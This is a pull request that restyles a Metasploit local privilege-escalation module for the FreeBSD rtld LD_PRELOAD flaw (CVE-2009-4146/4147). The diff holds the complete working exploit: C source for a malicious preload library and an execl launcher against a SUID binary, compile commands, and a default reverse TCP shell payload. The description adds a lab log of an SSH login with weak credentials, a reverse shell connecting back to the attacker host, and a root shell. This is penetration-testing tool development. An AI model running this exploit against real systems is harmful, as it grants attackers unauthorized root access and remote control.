### PR TITLE
freebsd/local/rtld_execl_priv_esc: Use AutoCheck mixin and prefer cc over gcc

### DIFF
--- a/modules/exploits/freebsd/local/rtld_execl_priv_esc.rb
+++ b/modules/exploits/freebsd/local/rtld_execl_priv_esc.rb
@@ -6,78 +6,82 @@
 class MetasploitModule < Msf::Exploit::Local
   Rank = ExcellentRanking
 
+  prepend Msf::Exploit::Remote::AutoCheck
   include Msf::Post::File
   include Msf::Post::Unix
   include Msf::Exploit::EXE
   include Msf::Exploit::FileDropper
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'FreeBSD rtld execl() Privilege Escalation',
-      'Description'    => %q{
-        This module exploits a vulnerability in the FreeBSD
-        run-time link-editor (rtld).
+    super(
+      update_info(
+        info,
+        'Name' => 'FreeBSD rtld execl() Privilege Escalation',
+        'Description' => %q{
+          This module exploits a vulnerability in the FreeBSD
+          run-time link-editor (rtld).
 
-        The rtld `unsetenv()` function fails to remove `LD_*`
-        environment variables if `__findenv()` fails.
+          The rtld `unsetenv()` function fails to remove `LD_*`
+          environment variables if `__findenv()` fails.
 
-        This can be abused to load arbitrary shared objects using
-        `LD_PRELOAD`, resulting in privileged code execution.
+          This can be abused to load arbitrary shared objects using
+          `LD_PRELOAD`, resulting in privileged code execution.
 
-        This module has been tested successfully on:
+          This module has been tested successfully on:
 
-        FreeBSD 7.2-RELEASE (amd64); and
-        FreeBSD 8.0-RELEASE (amd64).
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-        [
-          'Kingcope', # Independent discovery, public disclosure, and exploit
-          'stealth',  # Discovery and exploit (4b1717926ed0d4823622011625fb1824)
-          'bcoles'    # Metasploit (using Kingcope's exploit code [modified])
-        ],
-      'DisclosureDate' => '2009-11-30',
-      'Platform'       => ['bsd'], # FreeBSD
-      'Arch'           =>
-        [
-          ARCH_X86,
-          ARCH_X64,
-          ARCH_ARMLE,
-          ARCH_AARCH64,
-          ARCH_PPC,
-          ARCH_MIPSLE,
-          ARCH_MIPSBE
-        ],
-      'SessionTypes'   => ['shell'],
-      'References'     =>
-        [
-          ['BID', '37154'],
-          ['CVE', '2009-4146'],
-          ['CVE', '2009-4147'],
-          ['SOUNDTRACK', 'https://www.youtube.com/watch?v=dDnhthI27Fg'],
-          ['URL', 'https://seclists.org/fulldisclosure/2009/Nov/371'],
-          ['URL', 'https://c-skills.blogspot.com/2009/11/always-check-return-value.html'],
-          ['URL', 'https://lists.freebsd.org/pipermail/freebsd-announce/2009-December/001286.html'],
-          ['URL', 'https://xorl.wordpress.com/2009/12/01/freebsd-ld_preload-security-bypass/'],
-          ['URL', 'https://securitytracker.com/id/1023250']
-        ],
-      'Targets'        => [['Automatic', {}]],
-      'DefaultOptions' =>
-        {
-          'PAYLOAD'          => 'bsd/x86/shell_reverse_tcp',
-          'PrependSetresuid' => true,
-          'PrependSetresgid' => true,
-          'PrependFork'      => true,
-          'WfsDelay'         => 10
+          FreeBSD 7.2-RELEASE (amd64); and
+          FreeBSD 8.0-RELEASE (amd64).
         },
-      'DefaultTarget'  => 0))
-    register_options [
-      OptString.new('SUID_EXECUTABLE', [ true, 'Path to a SUID executable', '/sbin/ping' ])
-    ]
-    register_advanced_options [
-      OptBool.new('ForceExploit', [false, 'Override check result', false]),
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'Kingcope', # Independent discovery, public disclosure, and exploit
+            'stealth', # Discovery and exploit (4b1717926ed0d4823622011625fb1824)
+            'bcoles' # Metasploit (using Kingcope's exploit code [modified])
+          ],
+        'DisclosureDate' => '2009-11-30',
+        'Platform' => ['bsd'], # FreeBSD
+        'Arch' =>
+          [
+            ARCH_X86,
+            ARCH_X64,
+            ARCH_ARMLE,
+            ARCH_AARCH64,
+            ARCH_PPC,
+            ARCH_MIPSLE,
+            ARCH_MIPSBE
+          ],
+        'SessionTypes' => ['shell'],
+        'References' =>
+          [
+            ['BID', '37154'],
+            ['CVE', '2009-4146'],
+            ['CVE', '2009-4147'],
+            ['SOUNDTRACK', 'https://www.youtube.com/watch?v=dDnhthI27Fg'],
+            ['URL', 'https://seclists.org/fulldisclosure/2009/Nov/371'],
+            ['URL', 'https://c-skills.blogspot.com/2009/11/always-check-return-value.html'],
+            ['URL', 'https://lists.freebsd.org/pipermail/freebsd-announce/2009-December/001286.html'],
+            ['URL', 'https://xorl.wordpress.com/2009/12/01/freebsd-ld_preload-security-bypass/'],
+            ['URL', 'https://securitytracker.com/id/1023250']
+          ],
+        'Targets' => [['Automatic', {}]],
+        'DefaultOptions' =>
+          {
+            'PAYLOAD' => 'bsd/x86/shell_reverse_tcp',
+            'PrependSetresuid' => true,
+            'PrependSetresgid' => true,
+            'PrependFork' => true,
+            'WfsDelay' => 10
+          },
+        'DefaultTarget' => 0
+      )
+    )
+    register_options([
+      OptString.new('SUID_EXECUTABLE', [true, 'Path to a SUID executable', '/sbin/ping'])
+    ])
+    register_advanced_options([
       OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
-    ]
+    ])
   end
 
   def base_dir
@@ -89,124 +93,116 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def upload(path, data)
-    print_status "Writing '#{path}' (#{data.size} bytes) ..."
-    rm_f path
-    write_file path, data
-    register_file_for_cleanup path
+    print_status("Writing '#{path}' (#{data.size} bytes) ...")
+    rm_f(path)
+    write_file(path, data)
+    register_file_for_cleanup(path)
   end
 
   def check
     kernel_release = cmd_exec('uname -r').to_s
     unless kernel_release =~ /^(7\.[012]|8\.0)/
-      vprint_error "FreeBSD version #{kernel_release} is not vulnerable"
-      return CheckCode::Safe
+      return CheckCode::Safe("FreeBSD version #{kernel_release} is not vulnerable")
     end
-    vprint_good "FreeBSD version #{kernel_release} appears vulnerable"
 
-    unless command_exists? 'gcc'
-      vprint_error 'gcc is not installed'
-      return CheckCode::Safe
-    end
-    print_good 'gcc is installed'
+    vprint_good("FreeBSD version #{kernel_release} appears vulnerable")
 
-    unless setuid? suid_exe_path
-      vprint_error "#{suid_exe_path} is not setuid"
-      return CheckCode::Detected
+    unless command_exists?('cc')
+      return CheckCode::Safe('cc is not installed')
     end
-    vprint_good "#{suid_exe_path} is setuid"
+
+    vprint_good('cc is installed')
+
+    unless setuid?(suid_exe_path)
+      return CheckCode::Detected("#{suid_exe_path} is not setuid")
+    end
+
+    vprint_good("#{suid_exe_path} is setuid")
 
     CheckCode::Appears
   end
 
   def exploit
-    unless check == CheckCode::Appears
-      unless datastore['ForceExploit']
-        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
-      end
-      print_warning 'Target does not appear to be vulnerable'
-    end
-
     if is_root?
       unless datastore['ForceExploit']
-        fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
+        fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')
       end
     end
 
-    unless writable? base_dir
-      fail_with Failure::BadConfig, "#{base_dir} is not writable"
+    unless writable?(base_dir)
+      fail_with(Failure::BadConfig, "#{base_dir} is not writable")
     end
 
-    if base_dir.length > 1_000
-      fail_with Failure::BadConfig, "#{base_dir} path length #{base_dir.length} is larger than 1,000"
+    max_len = 1_000
+    if base_dir.length > max_len
+      fail_with(Failure::BadConfig, "#{base_dir} path length #{base_dir.length} is larger than #{max_len}")
     end
 
-    payload_path = "#{base_dir}/.#{rand_text_alphanumeric 5..10}"
+    payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
 
-    executable_data = <<-EOF
-#include <stdio.h>
-#include <stdlib.h>
-#include <unistd.h>
+    executable_data = <<~LIB
+      #include <stdio.h>
+      #include <stdlib.h>
+      #include <unistd.h>
 
-void _init() {
-  extern char **environ;
-  environ=NULL;
-  system("#{payload_path} &");
-}
-EOF
+      void _init() {
+        extern char **environ;
+        environ=NULL;
+        system("#{payload_path} &");
+      }
+    LIB
 
-    executable_path = "#{base_dir}/.#{rand_text_alphanumeric 5..10}"
-    upload "#{executable_path}.c", executable_data
-    output = cmd_exec "gcc -o #{executable_path}.o -c #{executable_path}.c -fPIC -Wall"
-    register_file_for_cleanup "#{executable_path}.o"
+    executable_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
+    upload("#{executable_path}.c", executable_data)
+    output = cmd_exec("cc -o #{executable_path}.o -c #{executable_path}.c -fPIC -Wall")
+    register_file_for_cleanup("#{executable_path}.o")
 
     unless output.blank?
-      print_error output
-      fail_with Failure::Unknown, "#{executable_path}.c failed to compile"
+      print_error(output)
+      fail_with(Failure::Unknown, "#{executable_path}.c failed to compile")
     end
 
-    lib_name = ".#{rand_text_alphanumeric 5..10}"
+    lib_name = ".#{rand_text_alphanumeric(5..10)}"
     lib_path = "#{base_dir}/#{lib_name}"
-    output = cmd_exec "gcc -shared -Wall,-soname,#{lib_name}.0 #{executable_path}.o -o #{lib_path}.0 -nostartfiles"
-    register_file_for_cleanup "#{lib_path}.0"
+    output = cmd_exec("cc -shared -Wall,-soname,#{lib_name}.0 #{executable_path}.o -o #{lib_path}.0 -nostartfiles")
+    register_file_for_cleanup("#{lib_path}.0")
 
     unless output.blank?
-      print_error output
-      fail_with Failure::Unknown, "#{executable_path}.o failed to compile"
+      print_error(output)
+      fail_with(Failure::Unknown, "#{executable_path}.o failed to compile")
     end
 
-    exploit_data = <<-EOF
-#include <stdio.h>
-#include <stdlib.h>
-#include <string.h>
-#include <unistd.h>
+    exploit_data = <<~EXPLOIT
+      #include <stdio.h>
+      #include <stdlib.h>
+      #include <string.h>
+      #include <unistd.h>
 
-int main() {
-  extern char **environ;
-  environ = (char**)calloc(8096, sizeof(char));
+      int main() {
+        extern char **environ;
+        environ = (char**)calloc(8096, sizeof(char));
+        environ[0] = (char*)calloc(1024, sizeof(char));
+        environ[1] = (char*)calloc(1024, sizeof(char));
+        strcpy(environ[1], "LD_PRELOAD=#{lib_path}.0");
+        return execl("#{suid_exe_path}", "", (char *)0);
+      }
+    EXPLOIT
 
-  environ[0] = (char*)calloc(1024, sizeof(char));
-  environ[1] = (char*)calloc(1024, sizeof(char));
-  strcpy(environ[1], "LD_PRELOAD=#{lib_path}.0");
-
-  return execl("#{suid_exe_path}", "", (char *)0);
-}
-EOF
-
-    exploit_path = "#{base_dir}/.#{rand_text_alphanumeric 5..10}"
-    upload "#{exploit_path}.c", exploit_data
-    output = cmd_exec "gcc #{exploit_path}.c -o #{exploit_path} -Wall"
-    register_file_for_cleanup exploit_path
+    exploit_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
+    upload("#{exploit_path}.c", exploit_data)
+    output = cmd_exec("cc #{exploit_path}.c -o #{exploit_path} -Wall")
+    register_file_for_cleanup(exploit_path)
 
     unless output.blank?
-      print_error output
-      fail_with Failure::Unknown, "#{exploit_path}.c failed to compile"
+      print_error(output)
+      fail_with(Failure::Unknown, "#{exploit_path}.c failed to compile")
     end
 
-    upload payload_path, generate_payload_exe
-    chmod payload_path
+    upload(payload_path, generate_payload_exe)
+    chmod(payload_path)
 
-    print_status 'Launching exploit...'
-    output = cmd_exec exploit_path
+    print_status('Launching exploit...')
+    output = cmd_exec(exploit_path)
     output.each_line { |line| vprint_status line.chomp }
   end
 end


### PR DESCRIPTION
* `rubocop -a`
* Use `Msf::Exploit::Remote::AutoCheck` mixin
* Prefer `cc` over `gcc`

```
msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(scanner/ssh/ssh_login) > set username asdf
username => asdf
msf6 auxiliary(scanner/ssh/ssh_login) > set password asdf
password => asdf
msf6 auxiliary(scanner/ssh/ssh_login) > set rhosts 172.16.191.239
rhosts => 172.16.191.239
msf6 auxiliary(scanner/ssh/ssh_login) > run

[+] 172.16.191.239:22 - Success: 'asdf:asdf' 'uid=1002(asdf) gid=1002(asdf) groups=1002(asdf) FreeBSD freebsd-8-0-amd64.local 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21 15:02:08 UTC 2009     root@mason.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  amd64 '
[*] Command shell session 1 opened (172.16.191.165:44993 -> 172.16.191.239:22) at 2020-08-24 07:46:42 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssh/ssh_login) > use exploit/freebsd/local/rtld_execl_priv_esc 
[*] Using configured payload bsd/x86/shell_reverse_tcp
msf6 exploit(freebsd/local/rtld_execl_priv_esc) > set session 1
session => 1
msf6 exploit(freebsd/local/rtld_execl_priv_esc) > set lhost 172.16.191.165
lhost => 172.16.191.165
msf6 exploit(freebsd/local/rtld_execl_priv_esc) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 172.16.191.165:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] Writing '/tmp/.MAam2qeM.c' (148 bytes) ...
[*] Writing '/tmp/.EeD7UW6.c' (364 bytes) ...
[*] Writing '/tmp/.l3boklVA' (172 bytes) ...
[*] Launching exploit...
[*] Command shell session 2 opened (172.16.191.165:4444 -> 172.16.191.239:61072) at 2020-08-24 07:47:08 -0400
[+] Deleted /tmp/.MAam2qeM.c
[+] Deleted /tmp/.MAam2qeM.o
[+] Deleted /tmp/.wMbpIY.0
[+] Deleted /tmp/.EeD7UW6.c
[+] Deleted /tmp/.EeD7UW6
[+] Deleted /tmp/.l3boklVA

id
uid=0(root) gid=0(wheel) groups=0(wheel)
uname -a
FreeBSD freebsd-8-0-amd64.local 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21 15:02:08 UTC 2009     root@mason.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  amd64
```
